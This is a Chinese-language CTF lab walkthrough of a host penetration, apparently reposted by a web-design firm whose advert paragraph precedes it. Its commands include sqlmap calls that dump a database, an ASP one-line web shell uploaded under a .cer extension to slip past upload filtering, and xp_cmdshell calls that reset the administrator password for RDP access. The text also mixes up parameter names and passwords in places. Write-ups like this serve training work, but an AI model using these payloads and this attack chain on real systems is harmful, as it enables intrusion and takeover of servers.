本文小編為大家詳細(xì)介紹“CTF主機(jī)滲透是實(shí)例分析”，內(nèi)容詳細(xì)，步驟清晰，細(xì)節(jié)處理妥當(dāng)，希望這篇“CTF主機(jī)滲透是實(shí)例分析”文章能幫助大家解決疑惑，下面跟著小編的思路慢慢深入，一起來學(xué)習(xí)新知識(shí)吧。

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于網(wǎng)站設(shè)計(jì)制作、做網(wǎng)站、政和網(wǎng)絡(luò)推廣、成都小程序開發(fā)、政和網(wǎng)絡(luò)營銷、政和企業(yè)策劃、政和品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等，從售前售中售后，我們都將竭誠為您服務(wù)，您的肯定，是我們最大的嘉獎(jiǎng)；成都創(chuàng)新互聯(lián)公司為所有大學(xué)生創(chuàng)業(yè)者提供政和建站搭建服務(wù)，24小時(shí)服務(wù)熱線：13518219792，官方網(wǎng)址：www.cdcxhl.com

第一步：我們?cè)L問鏈接：http://202.0.0.23/

進(jìn)入網(wǎng)頁首頁，通過瀏覽觀察，找到http://202.0.0.23/NewsList.asp?SortID=17 新聞資訊頁面，通過get方法提交的參數(shù)名為SortID，值為1，我們嘗試一下是否存在sql注入，通過sqlmap去跑一下。

發(fā)現(xiàn)存在sql注入漏洞
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

查看賬號(hào)密碼的數(shù)據(jù)庫表

對(duì)b2076528346216b3進(jìn)行md5解密，解密得密碼為admin1234賬號(hào)為root
第二步：接下來使用御劍后臺(tái)掃描，找到后臺(tái)登錄頁面

右鍵此頁面查看源碼，找到一個(gè)flag：

第三步：使用賬戶root密碼admin1234登錄后臺(tái)，在后臺(tái)系統(tǒng)信息-文件上傳處上傳后綴為.asp的asp一句話木馬，一句話木馬內(nèi)容：<%eval request("caidao")%>  (按照asp一句話木馬格式)

結(jié)果提示上傳文件格式不對(duì)，想下繞過辦法 

這里我們將一句話木馬文件改一個(gè)可執(zhí)行的后綴.cer

則上傳成功
第四步：下面我們直接上菜刀工具了

在網(wǎng)站根目錄發(fā)現(xiàn)flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

在數(shù)據(jù)庫配置文件中找到數(shù)據(jù)庫的賬號(hào)密碼

使用一句話木馬連接mssql數(shù)據(jù)庫

利用mssql數(shù)據(jù)庫的xpcmdshell組件執(zhí)行系統(tǒng)命令 EXEC master..xp_cmdshell 'whoami'

當(dāng)前cmdshell的權(quán)限是system權(quán)限，所以直接修改administrator的密碼為hacker：EXEC master..xp_cmdshell 'net user administrator 123456'

第五步：直接遠(yuǎn)程桌面連接服務(wù)器administrator/123456，在桌面發(fā)現(xiàn)flag文件，flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

在c盤發(fā)現(xiàn)另外一個(gè)flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

讀到這里，這篇“CTF主機(jī)滲透是實(shí)例分析”文章已經(jīng)介紹完畢，想要掌握這篇文章的知識(shí)點(diǎn)還需要大家自己動(dòng)手實(shí)踐使用過才能領(lǐng)會(huì)，如果想了解更多相關(guān)內(nèi)容的文章，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。